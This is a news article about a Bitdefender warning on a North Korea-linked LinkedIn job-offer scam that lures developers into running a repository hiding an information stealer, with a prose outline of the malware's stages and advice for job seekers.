Alert issued over North Korean LinkedIn job offer scam

Bitdefender has issued a warning concerning a cybercriminal group linked to North Korea, which has been delivering malware and stealing credentials through fraudulent LinkedIn job offers.

This warning comes after a Bitdefender researcher discovered that the so-called 'Lazarus Group' was targeting them as part of this cyber scheme. The scam is initiated with a seemingly appealing job offer that tempts victims into divulging personal data. The perpetrators provide a repository with questions that require answers, however, the repository is in fact executing malicious code capable of stealing data, using the device for cryptocurrency mining, disabling security measures, and other harmful activities.

Bitdefender has cautioned job seekers on LinkedIn to be alert to vague job descriptions, poor communication, suspicious email domains, and strongly advises against running unverified code.

The fraudulent operation commences with a promising message about an opportunity to work on a decentralised cryptocurrency exchange. While intentionally vague in detail, the proposal of remote work, flexible hours, and competitive pay can be reasonably attractive, drawing in unsuspecting individuals. The scam's variations have also appeared, with fake projects related to travel or finance. Once interested, the target is asked for a CV or a personal GitHub repository link, which can exploitatively serve the scammers by providing a facade of trust.

Upon submission of the required information, the hacker shares a repository, supposedly containing the project's 'minimum viable product' (MVP), alongside a document with questions that necessitate execution of the demo. The code disclosed seems innocuous at first but contains a sophisticatedly obfuscated script that surreptitiously loads malicious code from an external source.

Research conducted by Bitdefender has identified that the payload is a cross-platform information stealer deployable on Windows, macOS, and Linux. This tool is designed to target popular cryptocurrency wallets by seeking out browsing extensions related to cryptocurrency. It further collects significant files linked to these extensions and the login data of utilised browsers, transmitting this information to a malicious IP address.

Afterwards, a JavaScript stealer downloads and executes a Python script named main99_65.py. This script activates further malicious activities, decompressing and decoding itself multiple times to unveil additional scripts that enable the download of subsequent Python modules named mlip.py, pay.py, and bow.py.

The module mlip.py is tailored to hook keyboard events particularly in web browsers and monitor clipboard changes for crypto-related data, which is sent to a server controlled by the attacker. Another module, pay.py, gathers system information and valuable files, maintaining a persistent communication link for further commands. Meanwhile, bow.py focuses on browsers like Chrome, Brave, Opera, Yandex, and Microsoft Edge to extract and exfiltrate critical browser data.

The masterminds, believed to be North Korea-affiliated state-sponsored actors, such as the Lazarus Group, are notorious for using similar scams to infiltrate sectors like aviation, defence, and the nuclear industry, seeking to exfiltrate sensitive information and proprietary technologies.

As such malicious activities on social platforms are on the rise, Bitdefender emphasises the importance of caution. Red flags include vague job postings, suspicious repositories, and poor communication. Best practices suggest not running unverified code, verifying job offer authenticity, and scrutinising unsolicited communications.